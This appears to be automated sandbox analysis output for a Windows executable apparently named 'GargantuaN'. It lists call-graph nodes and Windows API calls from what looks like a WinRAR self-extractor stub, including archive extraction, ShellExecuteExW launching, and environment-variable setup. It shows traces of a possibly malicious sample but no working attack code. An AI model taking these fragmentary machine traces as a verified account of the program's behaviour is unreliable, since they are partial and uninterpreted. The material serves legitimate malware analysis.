d59be3 25138->25139 25140 d59bdc 25138->25140 25139->25140 25142 d59785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25139->25142 25157 d56d1a 77 API calls 25139->25157 25140->25088 25142->25139 25143->25088 25144->25085 25145->25108 25146->25108 25147->25108 25148->25108 25149->25108 25150->25108 25151->25095 25152->25099 25153->25097 25154->25128 25155->25131 25156->25137 25157->25139 25159 d77ce1 _abort 25158->25159 25160 d77cfa 25159->25160 25161 d77ce8 25159->25161 25182 d7ac31 EnterCriticalSection 25160->25182 25194 d77e2f GetModuleHandleW 25161->25194 25164 d77ced 25164->25160 25195 d77e73 GetModuleHandleExW 25164->25195 25167 d77d01 25178 d77d9f 25167->25178 25180 d77d76 25167->25180 25203 d787e0 20 API calls _abort 
25167->25203 25170 d77dbc 25186 d77dee 25170->25186 25171 d77de8 25204 d82390 5 API calls _ValidateLocalCookies 25171->25204 25172 d78a91 _abort 5 API calls 25172->25178 25176 d78a91 _abort 5 API calls 25177 d77d8e 25176->25177 25177->25172 25183 d77ddf 25178->25183 25180->25176 25180->25177 25182->25167 25205 d7ac81 LeaveCriticalSection 25183->25205 25185 d77db8 25185->25170 25185->25171 25206 d7b076 25186->25206 25189 d77e1c 25192 d77e73 _abort 8 API calls 25189->25192 25190 d77dfc GetPEB 25190->25189 25191 d77e0c GetCurrentProcess TerminateProcess 25190->25191 25191->25189 25193 d77e24 ExitProcess 25192->25193 25194->25164 25196 d77ec0 25195->25196 25197 d77e9d GetProcAddress 25195->25197 25198 d77ec6 FreeLibrary 25196->25198 25199 d77ecf 25196->25199 25202 d77eb2 25197->25202 25198->25199 25200 d6fbbc _ValidateLocalCookies 5 API calls 25199->25200 25201 d77cf9 25200->25201 25201->25160 25202->25196 25203->25180 25205->25185 25207 d7b091 25206->25207 25208 d7b09b 25206->25208 25210 d6fbbc _ValidateLocalCookies 5 API calls 25207->25210 25209 d7ac98 _abort 5 API calls 25208->25209 25209->25207 25211 d77df8 25210->25211 25211->25189 25211->25190 25395 d6b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25435 d61bbd GetCPInfo IsDBCSLeadByte 25397 d6eda7 48 API calls _unexpected 25436 d6f3a0 27 API calls 25363 d7a4a0 71 API calls _free 25364 d6dca1 DialogBoxParamW 25365 d808a0 IsProcessorFeaturePresent 25437 d56faa 111 API calls 3 library calls 25366 d6e455 14 API calls ___delayLoadHelper2@8 23505 d7c051 31 API calls _ValidateLocalCookies 23510 d6cd58 23512 d6ce22 23510->23512 23518 d6cd7b 23510->23518 23524 d6c793 _wcslen _wcsrchr 23512->23524 23538 d6d78f 23512->23538 23514 d6d40a 23516 d61fbb CompareStringW 23516->23518 23517 d6ca67 SetWindowTextW 23517->23524 23518->23512 23518->23516 23523 d6c855 SetFileAttributesW 23525 d6c90f GetFileAttributesW 23523->23525 23526 d6c86f _abort _wcslen 23523->23526 23524->23514 23524->23517 23524->23523 23530 d6cc31 
GetDlgItem SetWindowTextW SendMessageW 23524->23530 23533 d6cc71 SendMessageW 23524->23533 23537 d61fbb CompareStringW 23524->23537 23562 d6b314 23524->23562 23566 d6a64d GetCurrentDirectoryW 23524->23566 23571 d5a5d1 6 API calls 23524->23571 23572 d5a55a FindClose 23524->23572 23573 d6b48e 76 API calls 2 library calls 23524->23573 23574 d73e3e 23524->23574 23525->23524 23529 d6c921 DeleteFileW 23525->23529 23526->23524 23526->23525 23567 d5b991 51 API calls 2 library calls 23526->23567 23529->23524 23531 d6c932 23529->23531 23530->23524 23568 d54092 23531->23568 23533->23524 23535 d6c967 MoveFileW 23535->23524 23536 d6c97f MoveFileExW 23535->23536 23536->23524 23537->23524 23541 d6d799 _abort _wcslen 23538->23541 23539 d6d9e7 23539->23524 23540 d6d8a5 23587 d5a231 23540->23587 23541->23539 23541->23540 23542 d6d9c0 23541->23542 23590 d61fbb CompareStringW 23541->23590 23542->23539 23546 d6d9de ShowWindow 23542->23546 23546->23539 23547 d6d8d9 ShellExecuteExW 23547->23539 23554 d6d8ec 23547->23554 23549 d6d8d1 23549->23547 23550 d6d925 23592 d6dc3b 6 API calls 23550->23592 23551 d6d97b CloseHandle 23552 d6d994 23551->23552 23553 d6d989 23551->23553 23552->23542 23593 d61fbb CompareStringW 23553->23593 23554->23550 23554->23551 23556 d6d91b ShowWindow 23554->23556 23556->23550 23558 d6d93d 23558->23551 23559 d6d950 GetExitCodeProcess 23558->23559 23559->23551 23560 d6d963 23559->23560 23560->23551 23563 d6b31e 23562->23563 23564 d6b40d 23563->23564 23565 d6b3f0 ExpandEnvironmentStringsW 23563->23565 23564->23524 23565->23564 23566->23524 23567->23526 23608 d54065 23568->23608 23571->23524 23572->23524 23573->23524 23575 d78e54 23574->23575 23576 d78e61 23575->23576 23577 d78e6c 23575->23577 23695 d78e06 23576->23695 23579 d78e74 23577->23579 23586 d78e7d _abort 23577->23586 23580 d78dcc _free 20 API calls 23579->23580 23584 d78e69 23580->23584 23581 d78ea7 HeapReAlloc 23581->23584 23581->23586 23582 d78e82 23702 d791a8 20 API calls _abort 23582->23702 23584->23524 
23586->23581 23586->23582 23703 d77a5e 7 API calls 2 library calls 23586->23703 23594 d5a243 23587->23594 23590->23540 23591 d5b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 23591->23549 23592->23558 23593->23552 23602 d6ec50 23594->23602 23597 d5a261 23604 d5bb03 23597->23604 23598 d5a23a 23598->23547 23598->23591 23600 d5a275 23600->23598 23601 d5a279 GetFileAttributesW 23600->23601 23601->23598 23603 d5a250 GetFileAttributesW 23602->23603 23603->23597 23603->23598 23605 d5bb10 _wcslen 23604->23605 23606 d5bbb8 GetCurrentDirectoryW 23605->23606 23607 d5bb39 _wcslen 23605->23607 23606->23607 23607->23600 23609 d5407c __vswprintf_c_l 23608->23609 23612 d75fd4 23609->23612 23615 d74097 23612->23615 23616 d740d7 23615->23616 23617 d740bf 23615->23617 23616->23617 23619 d740df 23616->23619 23632 d791a8 20 API calls _abort 23617->23632 23634 d74636 23619->23634 23620 d740c4 23633 d79087 26 API calls ___std_exception_copy 23620->23633 23624 d740cf 23645 d6fbbc 23624->23645 23627 d74167 23643 d749e6 51 API calls 4 library calls 23627->23643 23628 d54086 GetFileAttributesW 23628->23531 23628->23535 23631 d74172 23644 d746b9 20 API calls _free 23631->23644 23632->23620 23633->23624 23635 d74653 23634->23635 23641 d740ef 23634->23641 23635->23641 23652 d797e5 GetLastError 23635->23652 23637 d74674 23672 d7993a 38 API calls __cftof 23637->23672 23639 d7468d 23673 d79967 38 API calls __cftof 23639->23673 23642 d74601 20 API calls 2 library calls 23641->23642 23642->23627 23643->23631 23644->23624 23646 d6fbc4 23645->23646 23647 d6fbc5 IsProcessorFeaturePresent 23645->23647 23646->23628 23649 d6fc07 23647->23649 23694 d6fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23649->23694 23651 d6fcea 23651->23628 23653 d79801 23652->23653 23654 d797fb 23652->23654 23658 d79850 SetLastError 23653->23658 23675 d7b136 23653->23675 23674 d7ae5b 11 API calls 2 library calls 23654->23674 23658->23637 23659 d7981b 23682 d78dcc 
23659->23682 23662 d79830 23662->23659 23664 d79837 23662->23664 23663 d79821 23665 d7985c SetLastError 23663->23665 23689 d79649 20 API calls _abort 23664->23689 23690 d78d24 38 API calls _abort 23665->23690 23667 d79842 23669 d78dcc _free 20 API calls 23667->23669 23671 d79849 23669->23671 23671->23658 23671->23665 23672->23639 23673->23641 23674->23653 23681 d7b143 _abort 23675->23681 23676 d7b183 23692 d791a8 20 API calls _abort 23676->23692 23677 d7b16e RtlAllocateHeap 23679 d79813 23677->23679 23677->23681 23679->23659 23688 d7aeb1 11 API calls 2 library calls 23679->23688 23681->23676 23681->23677 23691 d77a5e 7 API calls 2 library calls 23681->23691 23683 d78dd7 RtlFreeHeap 23682->23683 23687 d78e00 __dosmaperr 23682->23687 23684 d78dec 23683->23684 23683->23687 23693 d791a8 20 API calls _abort 23684->23693 23686 d78df2 GetLastError 23686->23687 23687->23663 23688->23662 23689->23667 23691->23681 23692->23679 23693->23686 23694->23651 23696 d78e44 23695->23696 23700 d78e14 _abort 23695->23700 23705 d791a8 20 API calls _abort 23696->23705 23697 d78e2f RtlAllocateHeap 23699 d78e42 23697->23699 23697->23700 23699->23584 23700->23696 23700->23697 23704 d77a5e 7 API calls 2 library calls 23700->23704 23702->23584 23703->23586 23704->23700 23705->23699 25368 d6a440 GdipCloneImage GdipAlloc 25420 d73a40 5 API calls _ValidateLocalCookies 25439 d81f40 CloseHandle 23752 d6e44b 23753 d6e3f4 23752->23753 23753->23752 23754 d6e85d ___delayLoadHelper2@8 14 API calls 23753->23754 23754->23753 25369 d51075 84 API calls 23756 d59a74 23757 d59a7e 23756->23757 23758 d59b9d SetFilePointer 23757->23758 23761 d59b79 23757->23761 23762 d59ab1 23757->23762 23763 d5981a 23757->23763 23759 d59bb6 GetLastError 23758->23759 23758->23762 23759->23762 23761->23758 23764 d59833 23763->23764 23767 d59e80 23764->23767 23768 d59e92 23767->23768 23771 d59ea5 23767->23771 23773 d59865 23768->23773 23776 d56d5b 77 API calls 23768->23776 23770 d59eb8 SetFilePointer 23772 d59ed4 GetLastError 
23770->23772 23770->23773 23771->23770 23771->23773 23772->23773 23774 d59ede 23772->23774 23773->23761 23774->23773 23777 d56d5b 77 API calls 23774->23777 23776->23771 23777->23773 25370 d6a070 10 API calls 25421 d6b270 99 API calls 25441 d51f72 128 API calls __EH_prolog 23825 d59f7a 23826 d59f8f 23825->23826 23827 d59f88 23825->23827 23828 d59f9c GetStdHandle 23826->23828 23835 d59fab 23826->23835 23828->23835 23829 d5a003 WriteFile 23829->23835 23830 d59fd4 WriteFile 23831 d59fcf 23830->23831 23830->23835 23831->23830 23831->23835 23833 d5a095 23837 d56e98 77 API calls 23833->23837 23835->23827 23835->23829 23835->23830 23835->23831 23835->23833 23836 d56baa 78 API calls 23835->23836 23836->23835 23837->23827 25442 d77f6e 52 API calls 3 library calls 25373 d6c793 107 API calls 4 library calls 24714 d6e569 24715 d6e517 24714->24715 24716 d6e85d ___delayLoadHelper2@8 14 API calls 24715->24716 24716->24715 25422 d78268 55 API calls _free 25443 d51710 86 API calls 25404 d6ad10 73 API calls 25376 d6a400 GdipDisposeImage GdipFree 25423 d6d600 70 API calls 25377 d76000 QueryPerformanceFrequency QueryPerformanceCounter 25407 d72900 6 API calls 4 library calls 25424 d7f200 51 API calls 25445 d7a700 21 API calls 25409 d6f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25446 d6ff30 LocalFree 25215 d7bb30 25216 d7bb42 25215->25216 25217 d7bb39 25215->25217 25219 d7ba27 25217->25219 25220 d797e5 _abort 38 API calls 25219->25220 25221 d7ba34 25220->25221 25239 d7bb4e 25221->25239 25223 d7ba3c 25248 d7b7bb 25223->25248 25226 d7ba53 25226->25216 25227 d78e06 __vsnwprintf_l 21 API calls 25228 d7ba64 25227->25228 25229 d7ba96 25228->25229 25255 d7bbf0 25228->25255 25231 d78dcc _free 20 API calls 25229->25231 25231->25226 25233 d7ba91 25265 d791a8 20 API calls _abort 25233->25265 25235 d7bada 25235->25229 25266 d7b691 26 API calls 25235->25266 25236 d7baae 25236->25235 25237 d78dcc _free 20 API calls 25236->25237 
25237->25235 25240 d7bb5a __FrameHandler3::FrameUnwindToState 25239->25240 25241 d797e5 _abort 38 API calls 25240->25241 25246 d7bb64 25241->25246 25243 d7bbe8 _abort 25243->25223 25246->25243 25247 d78dcc _free 20 API calls 25246->25247 25267 d78d24 38 API calls _abort 25246->25267 25268 d7ac31 EnterCriticalSection 25246->25268 25269 d7bbdf LeaveCriticalSection _abort 25246->25269 25247->25246 25249 d74636 __cftof 38 API calls 25248->25249 25250 d7b7cd 25249->25250 25251 d7b7ee 25250->25251 25252 d7b7dc GetOEMCP 25250->25252 25253 d7b805 25251->25253 25254 d7b7f3 GetACP 25251->25254 25252->25253 25253->25226 25253->25227 25254->25253 25256 d7b7bb 40 API calls 25255->25256 25257 d7bc0f 25256->25257 25259 d7bc60 IsValidCodePage 25257->25259 25262 d7bc16 25257->25262 25264 d7bc85 _abort 25257->25264 25258 d6fbbc _ValidateLocalCookies 5 API calls 25260 d7ba89 25258->25260 25261 d7bc72 GetCPInfo 25259->25261 25259->25262 25260->25233 25260->25236 25261->25262 25261->25264 25262->25258 25270 d7b893 GetCPInfo 25264->25270 25265->25229 25266->25229 25268->25246 25269->25246 25271 d7b977 25270->25271 25277 d7b8cd 25270->25277 25274 d6fbbc _ValidateLocalCookies 5 API calls 25271->25274 25276 d7ba23 25274->25276 25276->25262 25280 d7c988 25277->25280 25279 d7ab78 __vsnwprintf_l 43 API calls 25279->25271 25281 d74636 __cftof 38 API calls 25280->25281 25282 d7c9a8 MultiByteToWideChar 25281->25282 25285 d7c9e6 25282->25285 25292 d7ca7e 25282->25292 25284 d6fbbc _ValidateLocalCookies 5 API calls 25287 d7b92e 25284->25287 25286 d78e06 __vsnwprintf_l 21 API calls 25285->25286 25290 d7ca07 _abort __vsnwprintf_l 25285->25290 25286->25290 25294 d7ab78 25287->25294 25288 d7ca78 25299 d7abc3 20 API calls _free 25288->25299 25290->25288 25291 d7ca4c MultiByteToWideChar 25290->25291 25291->25288 25293 d7ca68 GetStringTypeW 25291->25293 25292->25284 25293->25288 25295 d74636 __cftof 38 API calls 25294->25295 25296 d7ab8b 25295->25296 25300 d7a95b 25296->25300 25299->25292 25301 d7a976 
__vsnwprintf_l 25300->25301 25302 d7a99c MultiByteToWideChar 25301->25302 25303 d7a9c6 25302->25303 25304 d7ab50 25302->25304 25308 d78e06 __vsnwprintf_l 21 API calls 25303->25308 25310 d7a9e7 __vsnwprintf_l 25303->25310 25305 d6fbbc _ValidateLocalCookies 5 API calls 25304->25305 25306 d7ab63 25305->25306 25306->25279 25307 d7aa30 MultiByteToWideChar 25309 d7aa49 25307->25309 25322 d7aa9c 25307->25322 25308->25310 25327 d7af6c 25309->25327 25310->25307 25310->25322 25314 d7aa73 25317 d7af6c __vsnwprintf_l 11 API calls 25314->25317 25314->25322 25315 d7aaab 25316 d78e06 __vsnwprintf_l 21 API calls 25315->25316 25319 d7aacc __vsnwprintf_l 25315->25319 25316->25319 25317->25322 25318 d7ab41 25335 d7abc3 20 API calls _free 25318->25335 25319->25318 25320 d7af6c __vsnwprintf_l 11 API calls 25319->25320 25323 d7ab20 25320->25323 25336 d7abc3 20 API calls _free 25322->25336 25323->25318 25324 d7ab2f WideCharToMultiByte 25323->25324 25324->25318 25325 d7ab6f 25324->25325 25337 d7abc3 20 API calls _free 25325->25337 25328 d7ac98 _abort 5 API calls 25327->25328 25329 d7af93 25328->25329 25332 d7af9c 25329->25332 25338 d7aff4 10 API calls 3 library calls 25329->25338 25331 d7afdc LCMapStringW 25331->25332 25333 d6fbbc _ValidateLocalCookies 5 API calls 25332->25333 25334 d7aa60 25333->25334 25334->25314 25334->25315 25334->25322 25335->25322 25336->25304 25337->25322 25338->25331 25380 d7c030 GetProcessHeap 25381 d51025 29 API calls 25382 d7f421 21 API calls __vsnwprintf_l 25425 d6c220 93 API calls _swprintf 25410 d7b4ae 27 API calls _ValidateLocalCookies

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00D60863: GetModuleHandleW.KERNEL32(kernel32), ref: 00D6087C
                                                          • Part of subcall function 00D60863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D6088E
                                                          • Part of subcall function 00D60863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D608BF
                                                          • Part of subcall function 00D6A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00D6A655
                                                          • Part of subcall function 00D6AC16: OleInitialize.OLE32(00000000), ref: 00D6AC2F
                                                          • Part of subcall function 00D6AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D6AC66
                                                          • Part of subcall function 00D6AC16: SHGetMalloc.SHELL32(00D98438), ref: 00D6AC70
                                                        • GetCommandLineW.KERNEL32 ref: 00D6DF5C
                                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00D6DF83
                                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00D6DF94
                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00D6DFCE
                                                          • Part of subcall function 00D6DBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00D6DBF4
                                                          • Part of subcall function 00D6DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D6DC30
                                                        • CloseHandle.KERNEL32(00000000), ref: 00D6DFD7
                                                        • GetModuleFileNameW.KERNEL32(00000000,00DAEC90,00000800), ref: 00D6DFF2
                                                        • SetEnvironmentVariableW.KERNEL32(sfxname,00DAEC90), ref: 00D6DFFE
                                                        • GetLocalTime.KERNEL32(?), ref: 00D6E009
                                                        • _swprintf.LIBCMT ref: 00D6E048
                                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00D6E05A
                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00D6E061
                                                        • LoadIconW.USER32(00000000,00000064), ref: 00D6E078
                                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00D6E0C9
                                                        • Sleep.KERNEL32(?), ref: 00D6E0F7
                                                        • DeleteObject.GDI32 ref: 00D6E130
                                                        • DeleteObject.GDI32(?), ref: 00D6E140
                                                        • CloseHandle.KERNEL32 ref: 00D6E183
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                        • API String ID: 3049964643-2070194233
                                                        Uniqueness
                                                        • Uniqueness Score: -1.00%
                                                        Control-flow Graph (rendered graph; legend: Executed / Not Executed)
                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00D5A592,000000FF,?,?), ref: 00D5A6C4
                                                          • Part of subcall function 00D5BB03: _wcslen.LIBCMT ref: 00D5BB27
                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00D5A592,000000FF,?,?), ref: 00D5A6F2
                                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00D5A592,000000FF,?,?), ref: 00D5A6FE
                                                        • FindNextFileW.KERNEL32(?,?,?,?,?,?,00D5A592,000000FF,?,?), ref: 00D5A728
                                                        • GetLastError.KERNEL32(?,?,?,?,00D5A592,000000FF,?,?), ref: 00D5A734
                                                        Similarity
                                                        • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                        • String ID:
                                                        • API String ID: 42610566-0
                                                        Uniqueness
                                                        • Uniqueness Score: -1.00%
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000000,?,00D77DC4,00000000,00D8C300,0000000C,00D77F1B,00000000,00000002,00000000), ref: 00D77E0F
                                                        • TerminateProcess.KERNEL32(00000000,?,00D77DC4,00000000,00D8C300,0000000C,00D77F1B,00000000,00000002,00000000), ref: 00D77E16
                                                        • ExitProcess.KERNEL32 ref: 00D77E28
                                                        Similarity
                                                        • API ID: Process$CurrentExitTerminate
                                                        • String ID:
                                                        • API String ID: 1703294689-0
                                                        Uniqueness
                                                        • Uniqueness Score: -1.00%
                                                        APIs
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        Uniqueness
                                                        • Uniqueness Score: -1.00%
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D6B7E5
                                                          • Part of subcall function 00D51316: GetDlgItem.USER32(00000000,00003021), ref: 00D5135A
                                                          • Part of subcall function 00D51316: SetWindowTextW.USER32(00000000,00D835F4), ref: 00D51370
                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D6B8D1
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D6B8EF
                                                        • IsDialogMessageW.USER32(?,?), ref: 00D6B902
                                                        • TranslateMessage.USER32(?), ref: 00D6B910
                                                        • DispatchMessageW.USER32(?), ref: 00D6B91A
                                                        • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00D6B93D
                                                        • EndDialog.USER32(?,00000001), ref: 00D6B960
                                                        • GetDlgItem.USER32(?,00000068), ref: 00D6B983
                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D6B99E
                                                        • SendMessageW.USER32(00000000,000000C2,00000000,00D835F4), ref: 00D6B9B1
                                                          • Part of subcall function 00D6D453: _wcslen.LIBCMT ref: 00D6D47D
                                                        • SetFocus.USER32(00000000), ref: 00D6B9B8
                                                        • _swprintf.LIBCMT ref: 00D6BA24
                                                          • Part of subcall function 00D54092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D540A5
                                                          • Part of subcall function 00D6D4D4: GetDlgItem.USER32(00000068,00DAFCB8), ref: 00D6D4E8
                                                          • Part of subcall function 00D6D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00D6AF07,00000001,?,?,00D6B7B9,00D8506C,00DAFCB8,00DAFCB8,00001000,00000000,00000000), ref: 00D6D510
                                                          • Part of subcall function 00D6D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D6D51B
                                                          • Part of subcall function 00D6D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00D835F4), ref: 00D6D529
                                                          • Part of subcall function 00D6D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D6D53F
                                                          • Part of subcall function 00D6D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D6D559
                                                          • Part of subcall function 00D6D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D6D59D
                                                          • Part of subcall function 00D6D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D6D5AB
                                                          • Part of subcall function 00D6D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D6D5BA
                                                          • Part of subcall function 00D6D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D6D5E1
                                                          • Part of subcall function 00D6D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00D843F4), ref: 00D6D5F0
                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00D6BA68
                                                        • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00D6BA90
                                                        • GetTickCount.KERNEL32 ref: 00D6BAAE
                                                        • _swprintf.LIBCMT ref: 00D6BAC2
                                                        • GetLastError.KERNEL32(?,00000011), ref: 00D6BAF4
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00D6BB43
                                                        • _swprintf.LIBCMT ref: 00D6BB7C
                                                        • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00D6BBD0
                                                        • GetCommandLineW.KERNEL32 ref: 00D6BBEA
                                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00D6BC47
                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00D6BC6F
                                                        • Sleep.KERNEL32(00000064), ref: 00D6BCB9
                                                        • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00D6BCE2
                                                        • CloseHandle.KERNEL32(00000000), ref: 00D6BCEB
                                                        • _swprintf.LIBCMT ref: 00D6BD1E
                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D6BD7D
                                                        • SetDlgItemTextW.USER32(?,00000065,00D835F4), ref: 00D6BD94
                                                        • GetDlgItem.USER32(?,00000065), ref: 00D6BD9D
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00D6BDAC
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00D6BDBB
                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D6BE68
                                                        • _wcslen.LIBCMT ref: 00D6BEBE
                                                        • _swprintf.LIBCMT ref: 00D6BEE8
                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 00D6BF32
                                                        • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00D6BF4C
                                                        • GetDlgItem.USER32(?,00000068), ref: 00D6BF55
                                                        • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00D6BF6B
                                                        • GetDlgItem.USER32(?,00000066), ref: 00D6BF85
                                                        • SetWindowTextW.USER32(00000000,00D9A472), ref: 00D6BFA7
                                                        • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00D6C007
                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D6C01A
                                                        • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00D6C0BD
                                                        • EnableWindow.USER32(00000000,00000000), ref: 00D6C197
                                                        • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00D6C1D9
                                                          • Part of subcall function 00D6C73F: __EH_prolog.LIBCMT ref: 00D6C744
                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D6C1FD
                                                        Strings
                                                        Similarity
                                                        • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmap__vswprintf_c_l
                                                        • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\AppData\Local\Temp$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                        • API String ID: 581453772-4182265032
                                                        Uniqueness
                                                        • Uniqueness Score: -1.00%
                                                        Control-flow Graph (rendered graph; legend: Executed / Not Executed)
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(kernel32), ref: 00D6087C
                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D6088E
                                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D608BF
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D60B69
                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D60B83
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D60B93
                                                        • ReadFile.KERNEL32(00000000,?,00007FFE,00D83C7C,00000000), ref: 00D60BB1
                                                        • CloseHandle.KERNEL32(00000000), ref: 00D60C09
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D60C1E
                                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00D83C7C,?,00000000,?,00000800), ref: 00D60C72
                                                        • GetFileAttributesW.KERNELBASE(?,?,00D83C7C,00000800,?,00000000,?,00000800), ref: 00D60C9C
                                                        • GetFileAttributesW.KERNEL32(?,?,00D83D44,00000800), ref: 00D60CD8
                                                          • Part of subcall function 00D6081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D60836
                                                          • Part of subcall function 00D6081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D5F2D8,Crypt32.dll,00000000,00D5F35C,?,?,00D5F33E,?,?,?), ref: 00D60858
                                                        • _swprintf.LIBCMT ref: 00D60D4A
                                                        • _swprintf.LIBCMT ref: 00D60D96
                                                          • Part of subcall function 00D54092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D540A5
                                                        • AllocConsole.KERNEL32 ref: 00D60D9E
                                                        • GetCurrentProcessId.KERNEL32 ref: 00D60DA8
                                                        • AttachConsole.KERNEL32(00000000), ref: 00D60DAF
                                                        • _wcslen.LIBCMT ref: 00D60DC4
                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00D60DD5
                                                        • WriteConsoleW.KERNEL32(00000000), ref: 00D60DDC
                                                        • Sleep.KERNEL32(00002710), ref: 00D60DE7
                                                        • FreeConsole.KERNEL32 ref: 00D60DED
                                                        • ExitProcess.KERNEL32 ref: 00D60DF5
                                                        Strings
                                                        Similarity
                                                        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
